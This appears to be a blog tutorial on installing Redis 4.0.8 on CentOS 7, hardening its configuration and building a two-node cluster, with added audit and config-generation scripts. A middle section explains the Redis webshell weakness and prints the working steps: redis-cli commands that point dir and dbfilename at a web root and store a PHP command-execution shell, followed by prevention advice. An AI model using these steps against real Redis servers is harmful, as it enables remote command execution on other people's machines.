CentOS 7.x: install Redis 4.0.8 and build a Redis cluster

Posted by chrisv on Tue, 17 Mar 2020 12:24:00 +0100

Install redis

  1. Preparation before installation

    yum install \
    vim \
    wget \
    make \
    gcc \
    gcc-c++ \
    automake \
    autoconf \
    -y
  2. Download, unzip and install

    cd /root
    wget http://download.redis.io/releases/redis-4.0.8.tar.gz
    tar -zxvf redis-4.0.8.tar.gz
    cd redis-4.0.8
    make PREFIX=/usr/local/redis/ install
  3. Create the data file storage location required in the configuration

    mkdir /data
    mkdir /data/redis
    mkdir /usr/local/redis/log
  4. Add and modify the configuration file (reference configuration)

    cp ./redis.conf /usr/local/redis
    vim /usr/local/redis/redis.conf
    # IP binding
    # Protected mode (note: with this enabled the Redis instances cannot reach each other, so it must not be enabled for a cluster)
    protected-mode yes
    # Listening port
    port 6379
    # Client idle timeout in seconds; 0 disables the timeout
    timeout 0
    # Run as a daemon
    daemonize yes
    # Data file path
    dir /data/redis
    # Path to the process ID file
    pidfile /usr/local/redis/log/redis.pid
    # Log file path
    logfile /usr/local/redis/log/redis.log
    # Enable keyspace notifications for expired keys
    notify-keyspace-events Ex
    # The following security options are for reference only
        # Disable some dangerous commands
        rename-command FLUSHALL ""
        rename-command CONFIG   ""
        rename-command EVAL     ""
        # Set an access password
        requirepass ********
        # Bind to the local IP only
  5. Performance optimization

    # Edit /etc/rc.local
    vim /etc/rc.local
    echo never > /sys/kernel/mm/transparent_hugepage/enabled
    # Give /etc/rc.local execute permission
    chmod +x /etc/rc.d/rc.local
    # Edit /etc/sysctl.conf
    vim /etc/sysctl.conf
    vm.overcommit_memory = 1
    net.core.somaxconn = 1024
    # Apply immediately, without rebooting
    echo never > /sys/kernel/mm/transparent_hugepage/enabled
    echo 1024 > /proc/sys/net/core/somaxconn
    sysctl vm.overcommit_memory=1
    sysctl -p
  6. Modify directory ownership

    useradd -s /sbin/nologin -M redis
    chown -R redis:redis /data/redis
    chown -R redis:redis /usr/local/redis
  7. Start redis and enable it at boot

    # Enter the unit file directory
    cd /etc/systemd/system
    # Create the redis unit file, named [unit name].[unit type]
    vim redis.service
    [Unit]
    Description=Start redis on boot.
    After=network.target

    [Service]
    # redis.conf sets daemonize yes, so systemd must track the forked child through the pid file
    Type=forking
    PIDFile=/usr/local/redis/log/redis.pid
    # Run as the unprivileged user created in step 6
    User=redis
    Group=redis
    ExecStart=/usr/local/redis/bin/redis-server /usr/local/redis/redis.conf
    ExecReload=/bin/kill -s HUP $MAINPID
    ExecStop=/bin/kill -s QUIT $MAINPID

    [Install]
    WantedBy=multi-user.target
    # Make the unit file owned by root and editable only by root
    chown root:root /etc/systemd/system/redis.service
    chmod 644 /etc/systemd/system/redis.service
    # Reload systemd, enable the unit at boot and start it
    systemctl daemon-reload
    systemctl enable redis
    systemctl start redis
  8. Store and read data

    /usr/local/redis/bin/redis-cli -h
    set num 123
    get num
  9. Batch delete keys matching a pattern

    # KEYS scans the whole keyspace and blocks the server while it runs
    redis-cli keys [pattern] | xargs redis-cli del

Redis fails to start after a crash because the AOF file is corrupted

  1. Back up the AOF file
  2. Repair the damaged AOF file

    redis-check-aof --fix [AOF filename]
  3. Restart redis

The Redis webshell vulnerability and how it is exploited

Reference link

  1. Principle of the vulnerability

    1. Redis natively supports 'redis-cli > config set', which changes the dir and dbfilename
      configuration dynamically, without restarting the redis service;
    2. If 'dir /www/' and 'dbfilename test.php' are set in the redis configuration, then
      when the save command is executed a data store file test.php is written to the /www/ directory.

    The file is a binary file, but its content contains the values of the saved data; if /www/ is the web
    root, then /www/test.php becomes an entry point into your server;

  2. Example of the vulnerability (this is a negative example, showing how not to do it)

    1. redis runs as root
    2. Nginx is started as root and its worker processes also run as root
    3. The web server is nginx, configured as follows:

      server {
          listen       x;
          server_name  xxx.xxx.com;
          root         /www;
          location / {
              index    index.php index.html index.htm;
          }
          location ~ \.php$ {
              fastcgi_index  index.php;
              fastcgi_param  SCRIPT_NAME      $fastcgi_script_name;
              fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
              include        fastcgi_params;
          }
      }
    4. The following commands are executed through redis-cli

      config set dir /www/
      config set dbfilename test.php
      set test "<?php exec($_GET['cmd']); ?>"
    5. And then something terrible happens

      1. The /www/ directory now contains the file test.php, which can be reached at http://xxx.xxx.com/test.php
      2. Visiting http://xxx.xxx.com/test.php?cmd=xxx then executes xxx as root (xxx being any Linux command)

Prevention of the Redis webshell vulnerability

  1. Do not expose redis web management tools on the internet
  2. Run redis as a low-privilege user (with an unpredictable user name, such as rediser)
  3. Make redis reachable only from localhost and the intranet (bind to the local or intranet address only)
  4. Disable the config command in redis (rename-command CONFIG in the configuration file disables it)
  5. Run the web service's worker processes as a low-privilege user (because the webshell runs as the user of the web service's worker process)
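Items 3 and 4 of this list, together with the bind, protected-mode and requirepass settings from the reference configuration earlier on the page, can be checked mechanically against a redis.conf before the service is started. The script below is an added example, not part of the original post: it reads a redis.conf and reports a missing or 0.0.0.0 bind, protected-mode not set to yes, an empty requirepass, and CONFIG not renamed. The function names conf_get and audit_redis_conf and the sample files in the usage note are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: audit a redis.conf for the
# settings that leave the dir/dbfilename trick open to unauthenticated clients.
set -eu

# Print the last value given for a directive (Redis applies the last one it reads).
# Usage: conf_get <file> <directive>
conf_get() {
    awk -v key="$2" '
        $1 == key {
            val = $2
            for (i = 3; i <= NF; i++) val = val " " $i
        }
        END { print val }
    ' "$1"
}

# Print one finding per line; print nothing when the file passes every check.
# Usage: audit_redis_conf <file>
audit_redis_conf() {
    local f="$1" bind pm pass

    bind=$(conf_get "$f" bind)
    if [ -z "$bind" ]; then
        echo "bind is not set: redis listens on every interface"
    elif printf '%s\n' "$bind" | grep -Eq '(^|[[:space:]])0\.0\.0\.0([[:space:]]|$)'; then
        echo "bind includes 0.0.0.0: reachable from outside the host"
    fi

    pm=$(conf_get "$f" protected-mode)
    [ "$pm" = "yes" ] || echo "protected-mode is '${pm:-unset}' (expected yes)"

    # requirepass may be written with or without quotes
    pass=$(conf_get "$f" requirepass)
    pass=${pass#\"}; pass=${pass%\"}
    [ -n "$pass" ] || echo "requirepass is empty: unauthenticated access allowed"

    # rename-command names are case-insensitive, so match CONFIG in any case
    if ! grep -Eiq '^[[:space:]]*rename-command[[:space:]]+config[[:space:]]' "$f"; then
        echo "CONFIG is not renamed: dir and dbfilename can be changed at runtime"
    fi
}

# Usage (path as in the post):
#   audit_redis_conf /usr/local/redis/redis.conf
```

Run it against the file you are about to hand to redis-server; an empty output means all four checks passed. Because conf_get keeps the last occurrence of a directive, a stray `protected-mode no` appended at the end of the file is caught even when an earlier line sets it to yes, which is how Redis itself resolves duplicates.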

Redis cluster

  1. Preparation before the cluster (single-machine test with two services, on ports 6379 and 6380)

    #Intranet IP:
  2. Modify redis.conf

    vim /usr/local/redis/redis.conf
    # Enable cluster mode
    cluster-enabled yes
    # Cluster state file (maintained by redis itself)
    cluster-config-file nodes-6379.conf
    # Cluster node timeout in milliseconds
    cluster-node-timeout 15000
    # Keep serving when some hash slots are uncovered instead of taking the whole cluster down
    cluster-require-full-coverage no
    # Slave validity factor (how stale a slave may be and still be promoted)
    cluster-slave-validity-factor 10
    # Migration barrier (a master must keep at least this many slaves, so it needs two before one slave migrates)
    cluster-migration-barrier 1
  3. Add the per-port configuration files

    yum install ruby
    gem install redis
    cp /usr/local/redis/redis.conf /usr/local/redis/redis.conf.backup
    cp /usr/local/redis/redis.conf /usr/local/redis/redis-6379.conf
    cp /usr/local/redis/redis.conf /usr/local/redis/redis-6380.conf
    mkdir /usr/local/redis/data/6379
    mkdir /usr/local/redis/data/6380
  4. Modify redis-6379.conf

    vim /usr/local/redis/redis-6379.conf
    unixsocket /usr/local/redis/data/6379/redis.sock
    pidfile /usr/local/redis/log/redis_6379.pid
    logfile /usr/local/redis/log/redis_6379.log
    dir /usr/local/redis/data/6379/
    port 6379
  5. Modify redis-6380.conf

    vim /usr/local/redis/redis-6380.conf
    unixsocket /usr/local/redis/data/6380/redis.sock
    pidfile /usr/local/redis/log/redis_6380.pid
    logfile /usr/local/redis/log/redis_6380.log
    dir /usr/local/redis/data/6380/
    port 6380
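Steps 3 to 5 produce the per-port files by copying redis.conf and editing each copy by hand. The function below is an added example, not part of the original post: it generates one node's config from the shared redis.conf by stripping the directives that must differ per node (port, dir, pidfile, logfile, unixsocket, cluster-config-file) and appending the port-specific values, following the post's /usr/local/redis layout. The name make_node_conf and the redis_home parameter are this example's own.

```shell
#!/usr/bin/env bash
# Added example, not from the original post: derive a per-port redis config
# from the shared redis.conf, as steps 3 to 5 do by hand for 6379 and 6380.
set -eu

# Usage: make_node_conf <base.conf> <port> <redis_home>
# Writes <redis_home>/redis-<port>.conf, creates <redis_home>/data/<port>
# and <redis_home>/log, and prints the path of the generated file.
make_node_conf() {
    local base="$1" port="$2" home="$3"
    local out="$home/redis-$port.conf" datadir="$home/data/$port"

    mkdir -p "$datadir" "$home/log"

    # Step 2 must already have turned cluster mode on in the shared file.
    if ! grep -Eq '^[[:space:]]*cluster-enabled[[:space:]]+yes' "$base"; then
        echo "warning: $base has no 'cluster-enabled yes' (see step 2)" >&2
    fi

    # Remove the directives we override; Redis keeps the last occurrence, so
    # leaving the old lines in place would be harmless but misleading to read.
    grep -Ev '^[[:space:]]*(port|dir|pidfile|logfile|unixsocket|cluster-config-file)[[:space:]]' \
        "$base" > "$out" || :

    # Append the node-specific values, mirroring steps 4 and 5.
    printf '%s\n' \
        "port $port" \
        "dir $datadir/" \
        "unixsocket $datadir/redis.sock" \
        "pidfile $home/log/redis_$port.pid" \
        "logfile $home/log/redis_$port.log" \
        "cluster-config-file nodes-$port.conf" >> "$out"

    echo "$out"
}

# Usage (paths as in the post):
#   make_node_conf /usr/local/redis/redis.conf 6379 /usr/local/redis
#   make_node_conf /usr/local/redis/redis.conf 6380 /usr/local/redis
```

Each generated file keeps everything else from the shared config (requirepass, rename-command, cluster timeouts), so the hardening settings only have to be maintained in one place; cluster-config-file is given a per-port name so the two nodes never share a state file even if dir is later changed.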
  6. Modify the startup script

    vim /etc/rc.local
    /usr/local/redis/bin/redis-server /usr/local/redis/redis-6379.conf
    /usr/local/redis/bin/redis-server /usr/local/redis/redis-6380.conf
  7. Create cluster

    cd /root/redis-4.0.8/src/
    # View help
    ./redis-trib.rb help
    # Create the cluster, one slave per master, from the listed node IP:port pairs
    ./redis-trib.rb create --replicas 1
  8. Cluster testing

    /usr/local/redis/bin/redis-cli -h -p 6379 -c
  9. Normal shutdown (do not force shutdown)

    /usr/local/redis/bin/redis-cli -h -p 6379 shutdown
